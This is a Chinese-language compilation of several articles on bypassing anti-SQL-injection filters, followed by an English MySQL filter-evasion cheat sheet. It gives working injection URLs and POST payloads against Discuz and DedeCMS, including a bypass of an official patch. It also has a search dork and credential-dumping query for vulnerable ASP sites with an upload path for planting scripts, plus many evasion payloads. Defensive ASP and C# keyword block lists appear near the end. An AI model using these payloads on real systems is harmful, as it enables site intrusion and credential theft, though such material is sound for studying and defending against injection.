下面就是小编给大家带来的几种通用防注入程序绕过方法脚本安全(共含8篇),希望大家喜欢,可以帮助到有需要的朋友!同时,但愿您也能像本文投稿人“大美”一样,积极向本站投稿分享好文章。
0x00 前言
目前主流的CMS系统当中都会内置一些防注入的程序,例如Discuz、dedeCMS等,本篇主要介绍绕过方法,
0x01 Discuz x2.0防注入
这里以Discuz最近爆出的一个插件的注入漏洞为例,来详细说明绕过方法。
漏洞本身很简单,存在于/source/plugin/v63shop/config.inc.php中的第29行getGoods函数中,代码如下所示
function getGoods($id){ $query = DB::query('select * from '.DB::table('v63_goods').' where `id` ='.$id); $goods = DB::fetch($query); $goods['endtime2'] = date('Y-m-d',$goods['endtime']); $goods['price2'] = $goods['price']; if($goods['sort'] ==2){ $goods['endtime2']= date('Y-m-d H:i:s',$goods['endtime']); $query = DB::query(“select * from ”.DB::table('v63_pm').“ where gid='$goods[id]' order by id desc ”); $last = DB::fetch($query); if(is_array($last)){ $goods['price'] = $last['chujia']; $goods['uid'] = $last['uid']; $goods['username'] = $last['username']; $goods['pm'] = $last; if(time+600>$goods['endtime']){ $goods['endtime'] = $last[time]+600; $goods['endtime2']= date('Y-m-d H:i:s',$last[time]+600); } } } return $goods;}
触发漏洞的入口点在/source/plugin/v63shop/goods.inc.php中的第6行和第8行,如图所示: 
下面可以构造如下请求触发漏洞了,如图所示: 
不过程序内置了一个_do_query_safe函数用来防注入,如图所示 
这里跟踪一下_do_query_safe()函数的执行,它会对以下关键字做过滤,如图所示:

因为我们的url中出现了union select,所以会被过滤掉。
这里利用Mysql的一个特性绕过_do_query_safe函数过滤,提交如下url:
localhost/discuzx2/plugin.php?id=v63shop:goods&pac=info&gid=1 and 1=2 union /*!50000select*/ 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user
这里我们跟踪一下,绕过的具体过程。它会将/**/中间的内容去掉,然后保存在$clean变量中,其值为
select * from pre_v63_goods where `id` =1 and 1=2 union /**/ 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user
再进一步跟踪,它会将/**/也去掉,然对$clean变量做过滤,如图所示
 此时$clean值,如图所示 
此时$clean变量中不在含有危险字符串,绕过_do_query_safe函数过滤,成功注入,截图如下: 
0x02 Discuz X2.5防注入
Discuz X2.5版修改了防注入函数的代码,在/config/config_global.php中有如下代码,如图所示 
这里$_config['security']['querysafe']['afullnote'] 默认被设置为0,重点关注这一点。
这里跟踪一下失败的原因,如图所示: 
此时观察一下变量,_do_query_safe($sql)函数会将/**/中的内容去掉,然后存到$clean中,如图所示: 
其实,程序执行到这里跟Discuz X2.0没有区别,$clean的值都一样。但是关键在下面,如图所示:
 因为前面提到$_config['security']['querysafe']['afullnote']=’0’,所以这里不会替换/**/为空,并且它在后面会判断$clean中是否会出现“/*”,如图所示:  
所以注入失败。
在Mysql当中,定义变量用@字符,可以用set @a=’abc’,来为变量赋值。这里为了合法的构造出一个单引号,目的是为了让sql正确,我们可以用@'放入sql语句当中,帮助我们绕过防注入程序检查。
这里利用如下方式绕过_do_query_safe函数过滤,如下所示:
localhost/discuz/plugin.php?id=v63shop:goods&pac=info&gid=@`'` union select @`'`,2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14 from mysql.user
这里跟踪一下执行的过程,如图所示:
 这里有一个if判断,重点看这句
$clean = preg_replace(“/'(.+?)'/s”, '', $sql);
它会将$sql中单引号引起来的字符串省略掉,所以我们可以用绕过dede防住ids的思路,利用
@`'` union select @`'`
这样的方法,在下面的过滤中省掉union select,这里跟踪一下,如图所示: 
这样便绕过了_do_query_safe函数检测,成功绕过防注入,如图所示: 
不过后来Discuz官方发布了一个修复补丁,但并没用从根本上解决问题。官方的修复代码如下: 
加了一个判断,过滤字符串中的@,但是始终没有修复根本问题,关键是上边的那个if判断会将单引号之间的内容(包括单引号)替换为空,代码如下:
if (strpos($sql, '/') === false && strpos($sql, '#') === false && strpos($sql, '-- ') === false) { $clean = preg_replace(“/'(.+?)'/s”, '', $sql);}
这里我只要稍做一下变换就可以让@字符消失,从而绕过它的过滤,利用如下所示:
localhost/discuz/plugin.php?id=v63shop:goods&pac=info&gid=`'` or @`''` union select 1 from (select count(*),concat((select database()),floor(rand(0)*2))a from information_schema.tables group by a)b where @`'`
这里我引入了`'`用来隐藏第一个@字符,并将第一个@`'`替换为@`''`,这样便可以替换掉第二个@,这里我们跟踪一下代码,如图所示: 
可以看到$clean变为
select * from pre_v63_goods where `id` =``
成功绕过补丁,如图所示:
 不过这样做的代价是不能再使用union select了,只能通过报错获取数据。
0x03 DedeCMS防注入
这里我也以最近热点分析的dedeCMS feedback.php注入漏洞为例,分析如何绕过其防注入系统。不过在这之前,还得先提一下这个漏洞。
漏洞存在于/plus/feedback.php中的第244行,代码如下所示
if($comtype == 'comments') { $arctitle = addslashes($title); 0id = intval(0id); $ischeck = intval($ischeck); $feedbacktype = preg_replace(“#[^0-9a-z]#i”, “”, $feedbacktype); if($msg!='') { $inquery = “INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('$aid','0id','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); ”; $rs = $dsql->ExecuteNoneQuery($inquery); if(!$rs) { ShowMsg(' 发表评论错误! ', '-1'); //echo $dsql->GetError(); exit(); } } } //引用回复 elseif ($comtype == 'reply') { $row = $dsql->GetOne(“SELECT * FROM `#@__feedback` WHERE id ='$fid'”); $arctitle = $row['arctitle']; $aid =$row['aid']; $msg = $quotemsg.$msg; $msg = HtmlReplace($msg, 2); $inquery = “INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('$aid','0id','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')”; $dsql->ExecuteNoneQuery($inquery); }
这里$title变量未初始化,所以$title可以作为可控变量,所以我们可以进一步控制$arctitle。跟踪发现$arctitle被直接带入SQL语句当中,但是这里执行的INSERT语句入库之后会将前面addslashes转义的单引号在会员还原回去。进一步跟踪下面的代码,在第268行,如下所示
$row = $dsql->GetOne(“SELECT * FROM `#@__feedback` WHERE id ='$fid'”);$arctitle = $row['arctitle'];
这里的查询#@__feedback表正式上面INSERT的那个表,arctitle字段取出来放到$arctitle变量当中,继续跟踪到第273行,这下豁然开朗了,
$inquery = “INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('$aid','0id','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')”;
这里$arctitle变量未作任何处理,就丢进了SQL语句当中,由于我们可以控制$title,虽然$arctitle是被addslashes函数处理过的数据,但是被INSERT到数据库中又被还原了,所以综合起来这就造成了二次注入漏洞。
但是这里如何利用呢,通过跟踪代码发现,整个dede在整个过程中始终没有输出信息,所以我们无法通过构造公式报错来获取数据,但是进一步分析代码发现#@__feedback表当中的msg字段会被输出。由于$arctitle变量是可控的,所以我们可以通过构造SQL语句,将我们要执行的代码插入到msg字段当中,这样便可以输出执行的内容了。
众所周知,dedeCMS内置了一个CheckSql()函数用来防注入,它是80sec开发的通用防注入ids程序,每当执行sql之前都要用它来检查一遍。其代码如下所示:
function CheckSql($db_string,$querytype='select') { global $cfg_cookie_encode; $clean = ''; $error=''; $old_pos = 0; $pos = -1; $log_file = DEDEINC.'/../data/'.md5($cfg_cookie_encode).'_safe.txt'; $userIP = GetIP(); $getUrl = GetCurUrl(); //如果是普通查询语句,直接过滤一些特殊语法 if($querytype=='select') { $notallow1 = “[^0-9a-z@\._-]{1,}(union|sleep|benchmark|load_file|outfile)[^0-9a-z@\.-]{1,}”; //$notallow2 = “--|/\*”; if(preg_match(“/”.$notallow1.“/i”, $db_string)) { fputs(fopen($log_file,'a+'),“$userIP||$getUrl||$db_string||SelectBreak\r\n”); exit(“Safe Alert: Request Error step 1 !”); } } //完整的SQL检查 while (TRUE) { $pos = strpos($db_string, '\'', $pos + 1); if ($pos === FALSE) { break; } $clean .= substr($db_string, $old_pos, $pos - $old_pos); while (TRUE) { $pos1 = strpos($db_string, '\'', $pos + 1); $pos2 = strpos($db_string, '\\', $pos + 1); if ($pos1 === FALSE) { break; } elseif ($pos2 == FALSE || $pos2 >$pos1) { $pos = $pos1; break; } $pos = $pos2 + 1; } $clean .= '$s$'; $old_pos = $pos + 1; } $clean .= substr($db_string, $old_pos); $clean = trim(strtolower(preg_replace(array('~\s+~s' ), array(' '), $clean))); //老版本的Mysql并不支持union,常用的程序里也不使用union,但是一些 使用它,所以检查它 if (strpos($clean, 'union') !== FALSE && preg_match('~(^|[^a-z])union($|[^[a-z])~s', $clean) != 0) { $fail = TRUE; $error=“union detect”; } //发布版本的程序可能比较少包括--,#这样的注释,但是 经常使用它们 elseif (strpos($clean, '/*') >2 || strpos($clean, '--') !== FALSE || strpos($clean, '#') !== FALSE) { $fail = TRUE; $error=“comment detect”; } //这些函数不会被使用,但是 会用它来操作文件,down掉数据库 elseif (strpos($clean, 'sleep') !== FALSE && preg_match('~(^|[^a-z])sleep($|[^[a-z])~s', $clean) != 0) { $fail = TRUE; $error=“slown down detect”; } elseif (strpos($clean, 'benchmark') !== FALSE && preg_match('~(^|[^a-z])benchmark($|[^[a-z])~s', $clean) != 0) { $fail = TRUE; $error=“slown down detect”; } elseif (strpos($clean, 'load_file') !== FALSE && preg_match('~(^|[^a-z])load_file($|[^[a-z])~s', $clean) != 0) { $fail = TRUE; $error=“file fun detect”; } elseif (strpos($clean, 'into outfile') !== FALSE && preg_match('~(^|[^a-z])into\s+outfile($|[^[a-z])~s', $clean) != 0) { $fail = TRUE; $error=“file fun detect”; } //老版本的MYSQL不支持子查询,我们的程序里可能也用得少,但是 可以使用它来查询数据库敏感信息 elseif (preg_match('~\([^)]*?select~s', $clean) != 0) { $fail = TRUE; $error=“sub select detect”; } if (!empty($fail)) { fputs(fopen($log_file,'a+'),“$userIP||$getUrl||$db_string||$error\r\n”); exit(“Safe Alert: Request Error step 2!”); } else { return $db_string; } }
但通过跟踪这段代码发现,它有个特征就是会将两个单引号之间的内容用$s$替换,例如’select’会被替换为$s$,这里用两个@`'`包含敏感字,这样$clean变量中就不会出现敏感字,从而绕过CheckSql()函数检测,
这里可以设置title为如下代码,一方面绕过ids防注入代码检测,另一方面加一个#注释掉后面的代码,但是还要做一下变形,就是这个char(@`'`)了。因为#@__feedback的所有字段都被设置为NOT NULL,而@`'`是一个变量,默认为NULL,直接插入@`'`的话会报错,所以需要以char(@`'`)的方法转换一下。
',char(@`'`),1,1,1,1,1,1,1,(SELECT user()))#,(1,
跟踪代码,如图所示 
如下SQL语句
INSERT INTO `dede_feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('1','1','游客','\',char(@`\'`),1,1,1,1,1,1,1,(SELECT user()))#,(1,','127.0.0.1','1','1364401789', '0','0','0','feedback','1','genxor');
被替换为了
insert into `dede_feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`) values ($s$,$s$,$s$,$s$,$s$,$s$,$s$, $s$,$s$,$s$,$s$,$s$,$s$);
字符串中没有任何敏感字,成功绕过CheckSql()函数检测。
POST如下请求给feedback.php,如下所示:
action=send&comtype=comments&aid=1&isconfirm=yes&feedbacktype=feedback&face=1&msg=genxor¬user=1&typeid=1&title=',char(@`'`),1,1,1,1,1,1,1,(SELECT user()))#,(1,
跟踪代码,实际执行的SQL语句跟踪变量如下所示: 
入数据库中的内容,如图所示: 
下面再POST如下内容给feedback.php,
action=send&comtype=reply&aid=1&isconfirm=yes&feedbacktype=feedback&fid=50
跟踪一下这里执行的SQL语句,如图所示 
所以select user()执行了,并且可以作为msg字段输出。
0x04 总结
在写这篇文章之前,我分析了很多常用的cms系统的源码,包括discuz、dedecms、phpwind、phpcms等,只有在discuz、dedecms这两个系统中用到通用防注入,但是它们所覆盖的用户群已将相当庞大了。如果能在发现程序注入漏洞的情况下,这些绕过方法还是很有价值的。
该程序采用枫叶通用防注入1.0asp版,此程序pro_show.asp处存在cookies注入或者变型注入漏洞,到目前为止还是有很多网站任然没有修复这个漏洞,也有些网站简单采取了防注入(据说可以绕过哦),
百度关键字:inurl:pro_show.asp?showid=
注入前可以先判断一下字段数:www.xxx.com/pro_show.asp?showid=17 order by 28
注入语句:www.xxx.com/pro_show.asp?showid=17 and 1=1 union select 1,username,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from lei_admin
字段数自己判断,我试了2个网站都是28,至于密码有明文也有md5加密的,后台自找,
后台上传地址:admin/inc/upfile.htm 可直接上传asp文件
代码一:
<%
'--------定义部份------------------
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
'自定义需要过滤的字串,用 “防 ” 分隔
Fy_In = “’’’’防;防and防exec防insert防select防delete防update防count防*防%防chr防mid防master防 truncate防char防declare防 <防>防=防 |防-防_ ”
Fy_Inf = split(Fy_In, “防 ”)
If Request.Form. < >“ ” Then
For Each Fy_Post In Request.Form
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh)) < >0 Then
Response.Write “
Response.Write ”非法操作!本站已经给大侠您做了如下记录↓
“
Response.Write ”操作IP: “&Request.ServerVariables( ”REMOTE_ADDR “)& ”
“
Response.Write ”操作时间: “&Now& ”
“
Response.Write ”操作页面: “&Request.ServerVariables( ”URL “)& ”
“
Response.Write ”提交方式:POST
“
Response.Write ”提交参数: “&Fy_Post& ”
“
Response.Write ”提交数据: “&Request.Form(Fy_Post)
Response.End
End If
Next
Next
End If
If Request.QueryString < >” “ Then
For Each Fy_Get In Request.QueryString
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh)) < >0 Then
Response.Write ”
Response.Write “非法操作!本站已经给大侠您做了如下记录↓
”
Response.Write “操作IP: ”&Request.ServerVariables( “REMOTE_ADDR ”)& “
”
Response.Write “操作时间: ”&Now& “
”
Response.Write “操作页面: ”&Request.ServerVariables( “URL ”)& “
”
Response.Write “提交方式:GET
”
Response.Write “提交参数: ”&Fy_Get& “
”
Response.Write “提交数据: ”&Request.QueryString(Fy_Get)
Response.End
End If
Next
Next
End If
% >
过滤网址的非法字符串
试试这两种方法:
第一种:
squery=lcase(Request.ServerVariables(“QUERY_STRING”))
sURL=lcase(Request.ServerVariables(“HTTP_HOST”))
SQL_injdata =“:|;|>|<|--|sp_|xp_|\|dir|cmd|^|(|)|+|$|'|copy|format|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare”
SQL_inj = split(SQL_Injdata,“|”)
For SQL_Data=0 To Ubound(SQL_inj)
if instr(squery&sURL,Sql_Inj(Sql_DATA))>0 Then
Response.Write “SQL通用防注入系统”
Response.end
end if
next
第二种:
SQL_injdata =“:|;|>|<|--|sp_|xp_|\|dir|cmd|^|(|)|+|$|'|copy|format|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare”
SQL_inj = split(SQL_Injdata,“|”)
If Request.QueryString“” Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then
Response.Write “SQL通用防注入系统”
Response.end
end if
next
Next
End If
If Request.Form“” Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then
Response.Write “SQL通用防注入系统”
Response.end
end if
next
next
end if
第三种
<%
'--------定义部份------------------
Dim Str_Post,Str_Get,Str_In,Str_Inf,Str_Xh,Str_db,Str_dbstr
'自定义需要过滤的字串,用 “■”分离
Str_In = “'■;■and■exec■insert■select■delete■update■count■*■%■chr■mid■master■truncate■char■declare”
'----------------------------------
%>
<%
Str_Inf = split(Str_In,“■”)
'--------POST部份------------------
If Request.Form“” Then
For Each Str_Post In Request.Form
For Str_Xh=0 To Ubound(Str_Inf)
If Instr(LCase(Request.Form(Str_Post)),Str_Inf(Str_Xh))0 Then
'--------写入数据库----------头-----
Str_dbstr=“DBQ=”+server.mappath(“SqlIn.mdb”)+“;DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};”
Set Str_db=Server.CreateObject(“ADODB.CONNECTION”)
Str_db.open Str_dbstr
Str_db.Execute(“insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('”&Request.ServerVariables(“REMOTE_ADDR”)&“','”&Request.ServerVariables(“URL”)&“','POST','”&Str_Post&“','”&replace(Request.Form(Str_Post),“'”,“''”)&“')”)
Str_db.close
Set Str_db = Nothing
'--------写入数据库----------尾-----
Response.Write “”
Response.Write “非法操作!系统做了如下记录:
”
Response.Write “操作IP:”&Request.ServerVariables(“REMOTE_ADDR”)&“
”
Response.Write “操作时间:”&Now&“
”
Response.Write “操作页面:”&Request.ServerVariables(“URL”)&“
”
Response.Write “提交方式:POST
”
Response.Write “提交参数:”&Str_Post&“
”
Response.Write “提交数据:”&Request.Form(Str_Post)
Response.End
End If
Next
Next
End If
'----------------------------------
'--------GET部份-------------------
If Request.QueryString“” Then
For Each Str_Get In Request.QueryString
For Str_Xh=0 To Ubound(Str_Inf)
If Instr(LCase(Request.QueryString(Str_Get)),Str_Inf(Str_Xh))0 Then
'--------写入数据库----------头-----
Str_dbstr=“DBQ=”+server.mappath(“SqlIn.mdb”)+“;DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};”
Set Str_db=Server.CreateObject(“ADODB.CONNECTION”)
Str_db.open Str_dbstr
Str_db.Execute(“insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('”&Request.ServerVariables(“REMOTE_ADDR”)&“','”&Request.ServerVariables(“URL”)&“','GET','”&Str_Get&“','”&replace(Request.QueryString(Str_Get),“'”,“''”)&“')”)
Str_db.close
Set Str_db = Nothing
'--------写入数据库----------尾-----
Response.Write “”
Response.Write “非法操作!系统做了如下记录:
”
Response.Write “操作IP:”&Request.ServerVariables(“REMOTE_ADDR”)&“
”
Response.Write “操作时间:”&Now&“
”
Response.Write “操作页面:”&Request.ServerVariables(“URL”)&“
”
Response.Write “提交方式:GET
”
Response.Write “提交参数:”&Str_Get&“
”
Response.Write “提交数据:”&Request.QueryString(Str_Get)
Response.End
End If
Next
Next
End If
%>
作者:Limit
VBS_Code:
Main
Function char(a)
Dim strr
For i = 1 To Len(a)
strr = strr & “)+char(” & Asc(Mid(a, i, 1))
Next
strr = strr & “)”
strr =Mid(strr, 3)
char = strr
End Function
Sub Main()
Dim Temp
Temp = char(inputbox (“请输入字符”, “Limit”) )
Temp = inputbox(“成功分离:”, “Limit”, temp)
End Sub
This week I presented my experiences in SQLi filter evasion techniques that I have gained during 3 years of PHPIDS filter evasion at the CONFidence 2.0 conference. You can find the slides here. For a quicker reference you can use the following cheatsheet. More detailed explaination can be found in the slides or in the talk (video should come online in a few weeks).
Basic filter
Comments
‘ or 1=1#
‘ or 1=1– -
‘ or 1=1/* (MySQL < 5.1)
‘ or 1=1;%00
‘ or 1=1 union select 1,2 as `
‘ or#newline
1=’1
‘ or– -newline
1=’1
‘ /*!50000or*/1=’1
‘ /*!or*/1=’1
Prefixes
+ – ~ !
‘ or –+2=- -!!!’2
Operators
^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL
Whitespaces
%20 %09 %0a %0b %0c %0d %a0 /**/
‘or+(1)sounds/**/like“1“–%a0-
‘union(select(1),tabe_name,(3)from`information_schema`.`tables`)#
Strings with quotes
SELECT ‘a’
SELECT “a”
SELECT n’a’
SELECT b’1100001′
SELECT _binary’1100001′
SELECT x’61′
Strings without quotes
‘abc’ = 0×616263
Aliases
select pass as alias from users
select pass aliasalias from users
select pass`alias alias`from users
Typecasting
‘ or true = ’1 # or 1=1
‘ or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1
‘ or ’1 # or true
Compare operator typecasting
select * from users where ‘a’=’b’=’c’
select * from users where (‘a’=’b’)=’c’
select * from users where (false)=’c’
select * from users where (0)=’c’
select * from users where (0)=0
select * from users where true
select * from users
Authentication bypass ‘=’
select * from users where name = ”=”
select * from users where false = ”
select * from users where 0 = 0
select * from users where true
select * from users
Authentication bypass ‘-’
select * from users where name = ”-”
select * from users where name = 0-0
select * from users where 0 = 0
select * from users where true
select * from users
Function filter
General function filtering
ascii (97)
load_file/*foo*/(0×616263)
Strings with functions
‘abc’ = unhex(616263)
‘abc’ = char(97,98,99)
hex(‘a’) = 61
ascii(‘a’) = 97
ord(‘a’) = 97
‘ABC’ = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))
Strings extracted from gadgets
collation(\N) // binary
collation(user()) // utf8_general_ci
@@time_format // %H:%i:%s
@@binlog_format // MIXED
@@version_comment // MySQL Community Server (GPL)
dayname(from_days(401)) // Mondaydayname(from_days(403)) // Wednesday
monthname(from_days(690)) // November
monthname(from_unixtime(1)) // January
collation(convert((1)using/**/koi8r)) // koi8r_general_ci
(select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs
Special characters extracted from gadgets
aes_encrypt(1,12) // 4çh±{?”^c×HéÉEa
des_encrypt(1,2) // ‚GÒ/ïÖk
@@ft_boolean_syntax // + -><()~*:””&|
@@date_format // %Y-%m-%d
@@innodb_log_group_home_dir // .\
Integer representations
false: 0
true: 1
true+true: 2
floor(pi()): 3
ceil(pi()): 4
floor(version()): 5
ceil(version()): 6
ceil(pi()+pi()): 7
floor(version()+pi()): 8
floor(pi()*pi()): 9
ceil(pi()*pi()): 10
concat(true,true): 11
ceil(pi()*pi())+true: 11
ceil(pi()+pi()+version()): 12
floor(pi()*pi()+pi()): 13
ceil(pi()*pi()+pi()): 14
ceil(pi()*pi()+version()): 15
floor(pi()*version()): 16
ceil(pi()*version()): 17
ceil(pi()*version())+true: 18
floor((pi()+pi())*pi()): 19
ceil((pi()+pi())*pi()): 20
ceil(ceil(pi())*version()): 21
concat(true+true,true): 21
ceil(pi()*ceil(pi()+pi())): 22
ceil((pi()+ceil(pi()))*pi()): 23
ceil(pi())*ceil(version()): 24
floor(pi()*(version()+pi())): 25
floor(version()*version()): 26
ceil(version()*version()): 27
ceil(pi()*pi()*pi()-pi()): 28
floor(pi()*pi()*floor(pi())): 29
ceil(pi()*pi()*floor(pi())): 30
concat(floor(pi()),false): 30
floor(pi()*pi()*pi()): 31
ceil(pi()*pi()*pi()): 32
ceil(pi()*pi()*pi())+true: 33
ceil(pow(pi(),pi())-pi()): 34
ceil(pi()*pi()*pi()+pi()): 35
floor(pow(pi(),pi())): 36
@@new: 0
@@log_bin: 1
!pi(): 0
!!pi(): 1
true-~true: 3
log(-cos(pi())): 0
-cos(pi()): 1
coercibility(user()): 3
coercibility(now()): 4
minute(now())
hour(now())
day(now())
week(now())
month(now())
year(now())
quarter(now())
year(@@timestamp)
crc32(true)
Extract substrings
substr(‘abc’,1,1) = ‘a’
substr(‘abc’ from 1 for 1) = ‘a’
substring(‘abc’,1,1) = ‘a’
substring(‘abc’ from 1 for 1) = ‘a’
mid(‘abc’,1,1) = ‘a’
mid(‘abc’ from 1 for 1) = ‘a’
lpad(‘abc’,1,space(1)) = ‘a’
rpad(‘abc’,1,space(1)) = ‘a’
left(‘abc’,1) = ‘a’
reverse(right(reverse(‘abc’),1)) = ‘a’
insert(insert(‘abc’,1,0,space(0)),2,222,space(0)) = ‘a’
space(0) = trim(version()from(version()))
Search substrings
locate(‘a’,’abc’)
position(‘a’,’abc’)
position(‘a’ IN ‘abc’)
instr(‘abc’,’a’)
substring_index(‘ab’,’b’,1)
Cut substrings
length(trim(leading ‘a’ FROM ‘abc’))
length(replace(‘abc’, ‘a’, ”))
Compare strings
strcmp(‘a’,’a’)
mod(‘a’,’a’)
find_in_set(‘a’,’a’)
field(‘a’,’a’)
count(concat(‘a’,’a’))
String length
length()
bit_length()
char_length()
octet_length()
bit_count()
String caseucase
lcase
lower
upper
password(‘a’) != password(‘A’)
old_password(‘a’) != old_password(‘A’)
md5(‘a’) != md5(‘A’)
sha(‘a’) != sha(‘A’)
aes_encrypt(‘a’) != aes_encrypt(‘A’)
des_encrypt(‘a’) != des_encrypt(‘A’)
Keyword filter
Connected keyword filtering
(0)union(select(table_name),column_name,…
0/**/union/*!50000select*/table_name`foo`/**/…
0%a0union%a0select%09group_concat(table_name)….
0′union all select all`table_name`foo from`information_schema`. `tables`
OR, AND
‘||1=’1
‘&&1=’1
‘=’
‘-’
OR, AND, UNION
‘ and (select pass from users limit 1)=’secret
OR, AND, UNION, LIMIT
‘ and (select pass from users where id =1)=’a
OR, AND, UNION, LIMIT, WHERE
‘ and (select pass from users group by id having id = 1)=’a
OR, AND, UNION, LIMIT, WHERE, GROUP
‘ and length((select pass from users having substr(pass,1,1)=’a’))
OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
‘ and (select substr(group_concat(pass),1,1) from users)=’a
‘ and substr((select max(pass) from users),1,1)=’a
‘ and substr((select max(replace(pass,’lastpw’,”)) from users),1,1)=’a
OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
‘ and substr(load_file(‘file’),locate(‘DocumentRoot’,(load_file(‘file’)))+length(‘DocumentRoot’),10)=’a
‘=” into outfile ‘/var/www/dump.txt
OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
‘ procedure analyse()#
‘-if(name=’Admin’,1,0)#
‘-if(if(name=’Admin’,1,0),if(substr(pass,1,1)=’a’,1,0),0)#
Control flow
case ‘a’ when ‘a’ then 1 [else 0] end
case when ‘a’=’a’ then 1 [else 0] end
if(‘a’=’a’,1,0)
ifnull(nullif(‘a’,’a’),1)
If you have any other useful tricks I forgot to list here please leave a comment.
1、运用编码技术绕过
如URLEncode编码,ASCII编码绕过,例如or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。
2、通过空格绕过
如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如
or swords =‘swords,由于mssql的松散性,我们可以把or swords 之间的空格去掉,并不影响运行。
3、运用字符串判断代替
用经典的or 1=1判断绕过,如or swords =swords,这个方法就是网上在讨论的。
4、通过类型转换修饰符N绕过
可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or swords = N swords ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。
5、通过+号拆解字符串绕过
效果值得考证,但毕竟是一种方法。如or swords =‘sw + ords ;EXEC(‘IN + SERT INTO + ….. )
6、通过LIKE绕过
以前怎么就没想到呢?如orswords LIKE sw!!!显然可以很轻松的绕过“=”“>”的限制……
7、通过IN绕过
与上面的LIKE的思路差不多,如or swords IN (swords)
8、通过BETWEEN绕过
如or swords BETWEEN rw AND tw
9、通过>或者<绕过>
or swords >sw
or swords < tw
or 1<3
……
10、运用注释语句绕过
用/**/代替空格,如:UNION /**/ Select /**/user,pwd,from tbluser
用/**/分割敏感词,如:U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser
11、用HEX绕过,一般的IDS都无法检测出来
0x730079007300610064006D0069006E00 =hex(sysadmin)
0x64006F006F0077006E0065007200 =hex(db_owner)
12、大小写互换绕过
select 可以写成 SelEct
union 可以写成 UnIoN
13、多种编码组合绕过
常用的有BASE64、ASC、SQL、HEX、URL编码
14、利用中转工具绕过
可以利用刺猬的中转工具来绕过
15、利用特殊字符填充绕过
这些特殊字符,会被解释成空格,方式和通过空格绕过一样的,一般用来绕过第三方防火墙软件
16、改变攻击方式
如果get提交实在无法绕过,可以尝试改变攻击方式,
如;post注入、寻找子站、旁站……等,如有疑问可以随时联系我QQ814360954哦,我很乐意和大家交流 技术。
网站安全非常重要,所以一个网站必须要有对攻击的基础防范措施,比如脚本攻击,跨域攻击,数据库注入攻击等,下面分享一个使用的防止数据库Sql脚本注入的使用类
using System;
using System.Collections.Generic;
using System.Text;
namespace NZS.Common
{
public class Filter
{
///
/// 检测是否含有危险字符(防止Sql注入)
///
///
///
public static bool HasSqlKeywords(string contents)
{
bool ReturnValue = false;
if (contents.Length >0)
{
string LowerStr = contents.ToLower;
string RxStr = @”(/sand/s)|(/sand/s)|(/slike/s)|(select/s)|(insert/s)|(delete/s)|(update/s[/s/S].*/sset)|(create/s)|(/stable)|(<[iframe.|/iframe.|script.|/script])|(‘)|(/sexec)|(declare)|(/struncate)|(/smaster)|(/sbackup)|(/smid)|(/scount)|(cast)|(%)|(/sadd/s)|(/salter/s)|(/sdrop/s)|(/sfrom/s)|(/struncate/s)|(/sxp_cmdshell/s)”; //Match 检查数据库里面关键字和一些特殊字符,如单引号
System.Text.RegularExpressions.Regex Rx = new System.Text.RegularExpressions.Regex(RxStr);
